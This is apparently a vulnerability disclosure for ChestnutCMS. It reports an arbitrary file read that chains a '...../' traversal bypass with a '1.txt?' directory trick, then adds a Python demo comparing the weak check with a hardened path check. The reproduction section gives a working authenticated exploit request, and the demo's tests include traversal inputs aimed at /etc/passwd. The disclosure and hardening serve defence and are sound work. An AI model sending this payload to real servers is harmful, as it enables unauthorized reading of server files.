Vendor of Product

https://github.com/liweiyi/ChestnutCMS

https://gitee.com/liweiyi/ChestnutCMS

ChestnutCMS has an arbitrary file read vulnerability. The /cms/file/read route reads the file named by the "filePath" parameter. Two checks guard it: FileExUtils.normalizePath(filePath) is meant to neutralise directory traversal, and !EDITABLE_FILE_TYPE.contains(FileExUtils.getExtension(path)) is meant to allow only files whose suffix is on a whitelist. Both can be bypassed. normalizePath is bypassed with the sequence "...../". The extension whitelist is bypassed by first using the folder creation function to create a directory named "1.txt?" and then requesting "1.txt?/...../[file]", so that getExtension evaluates the whitelisted "txt" suffix of the directory name instead of the suffix of the file actually read. Combined, the two bypasses give arbitrary file read.

Vulnerability reproduction

First create the "1.txt?" directory with the folder creation function

Then the "cms/file/read" route can be used, with an authenticated admin session as in the request below, to read any file

POST /dev-api/cms/file/read HTTP/1.1
Host: 127.0.0.1:1024
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Referer: http://10.11.35.176:1024/admin/index
Cookie: Authorization=1c2e571e-fadb-4e6c-aceb-92464899f3b7; Admin-Token=1c2e571e-fadb-4e6c-aceb-92464899f3b7
Accept-Language: zh-CN
Authorization: Bearer 47f03970-5de4-4b2a-8856-40a13a045942
Accept: application/json, text/plain, */*
Content-Type: application/json

{
    "filePath": "test1122/1.txt?/...../...../...../shell.jsp"
}

Root cause analysis

The "FileExUtils.getExtension" check used in "FileServiceImpl.java#readFile" can be bypassed with the "1.txt?" directory name: the suffix check passes on the whitelisted "txt" while the file actually opened is "shell.jsp". The check is made on the submitted string rather than on the file that is finally read.
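
The two checks from this report modelled side by side, as an added example that is not ChestnutCMS code. weak_extension is a hypothetical reconstruction of a suffix check that cuts the string at "?" (the behaviour the "1.txt?" bypass implies), safe_read_path is the hardened replacement that decides on the canonical resolved path, and run_demo rebuilds the "test1122/1.txt?" directory from the reproduction section inside a temporary directory. The whitelist contents, the sample file names and the weak check's exact logic are assumptions.

```python
import os
import tempfile

# Illustrative whitelist standing in for EDITABLE_FILE_TYPE; the real set in
# ChestnutCMS is not reproduced here (assumption).
EDITABLE_FILE_TYPE = {"txt", "html", "css", "js", "json", "xml"}

# The filePath value from the report's request.
PAYLOAD = "test1122/1.txt?/...../...../...../shell.jsp"


def weak_extension(path: str) -> str:
    """Hypothetical reconstruction of a suffix check that '?' can fool.

    Everything from the first '?' on is treated as a URL query string and the
    text after the last '.' of what remains is returned, which is what the
    report's observation implies.  This is NOT the project's code.
    """
    name = path.split("?", 1)[0]
    _head, sep, ext = name.rpartition(".")
    if not sep or "/" in ext:
        return ""
    return ext.lower()


def safe_read_path(base_dir: str, user_path: str, allowed: set) -> str:
    """Hardened resolution: decide on the resolved file, not the raw string."""
    if "\0" in user_path:
        raise ValueError("NUL byte in path")
    base_real = os.path.realpath(base_dir)
    # join() discards base_real if user_path is absolute; realpath() then
    # canonicalises every spelling of '..' and any symlinks.
    target = os.path.realpath(os.path.join(base_real, user_path))
    try:
        inside = os.path.commonpath([base_real, target]) == base_real
    except ValueError:  # paths on different drives (Windows)
        inside = False
    if not inside:
        raise ValueError("path escapes base directory")
    # Suffix taken from the canonical path, so '1.txt?/.../shell.jsp' is 'jsp'.
    ext = os.path.splitext(target)[1].lstrip(".").lower()
    if ext not in allowed:
        raise ValueError("file type not permitted")
    return target


def _rejected(base_dir: str, user_path: str) -> bool:
    """True if the hardened check refuses user_path."""
    try:
        safe_read_path(base_dir, user_path, EDITABLE_FILE_TYPE)
    except ValueError:
        return True
    return False


def run_demo() -> dict:
    """Rebuild the report's setup in a temp dir and compare both checks."""
    with tempfile.TemporaryDirectory() as base:
        # Attacker-created directory from the report ('?' is legal on Linux).
        os.makedirs(os.path.join(base, "test1122", "1.txt?"))
        legit = os.path.join(base, "test1122", "notes.txt")  # constructed sample
        with open(legit, "w") as fh:
            fh.write("constructed sample file\n")
        return {
            "weak_ext": weak_extension(PAYLOAD),
            "weak_passes_whitelist": weak_extension(PAYLOAD) in EDITABLE_FILE_TYPE,
            "strict_rejects_payload": _rejected(base, PAYLOAD),
            "strict_rejects_dotdot": _rejected(base, "test1122/1.txt?/../../../etc/passwd"),
            "strict_rejects_absolute": _rejected(base, "/etc/passwd"),
            "strict_allows_legit": safe_read_path(base, "test1122/notes.txt", EDITABLE_FILE_TYPE)
            == os.path.realpath(legit),
        }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Run it directly to print the comparison. The property that matters in the hardened check is that both the containment test and the suffix test are made on the canonical path that will actually be opened, so neither a "?" inside a directory name nor any spelling of ".." changes the answer: the report's payload resolves to a ".jsp" and is refused on suffix, and a traversal to /etc/passwd is refused because it falls outside the base. Rejecting "?" and similar characters when folders are created would be a reasonable additional hardening, since they have no place in a CMS file or folder name.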